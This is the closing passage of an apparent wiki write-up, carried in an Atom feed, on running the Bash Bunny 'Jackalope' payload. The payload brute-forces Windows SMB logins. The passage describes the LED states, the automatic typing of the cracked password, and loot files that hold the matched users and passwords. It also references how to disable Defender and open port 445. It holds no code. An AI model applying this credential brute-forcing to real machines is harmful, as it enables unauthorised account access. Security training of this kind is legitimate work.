&amp;amp;emsp;3. While attacking the LED will blink in a yellow colour. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;4. When Bash Bunny was successful, the LED will light green. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;5. You will have then the two possibilities as already mentioned in the Description section. Do it manually or toggle the button to put in the password automatically into the password phrase.&lt;br /&gt;
&lt;br /&gt;
&amp;amp;emsp;6. After toggling the screen should lock up. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Result ==&lt;br /&gt;
&lt;br /&gt;
In Bash Bunnys “loot”-folder the output of the attack could be found after the attack. &lt;br /&gt;
Following files can be found: &lt;br /&gt;
&lt;br /&gt;
* log.txt --&amp;gt; Can be used for troubleshooting/debugging. &lt;br /&gt;
* msfconsole.txt --&amp;gt; The non- and matching events of users to passwords on target host will displayed in this textfile.&lt;br /&gt;
* nmap_ results.txt --&amp;gt; Here the output of the nmap-scan is shown.&lt;br /&gt;
* password.txt --&amp;gt; All matching passwords are saved in this text file.&lt;br /&gt;
* user.txt --&amp;gt; All matching users are saved in this text file.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/Jackalope&lt;br /&gt;
* https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/smb/smb_login&lt;br /&gt;
* https://frameboxxindore.com/windows/you-asked-how-do-i-open-port-445-on-windows-10.html&lt;br /&gt;
* https://support.microsoft.com/en-us/windows/turn-off-defender-antivirus-protection-in-windows-security-99e6004f-c54c-8509-773c-a4d776b77960&lt;br /&gt;
* https://wiki.bashbunny.com/#!index.md#Tools&lt;br /&gt;
* https://docs.hak5.org/bash-bunny/writing-payloads/led&lt;/div&gt;</summary>
		<author><name>EPelanovic</name></author>
	</entry>
</feed>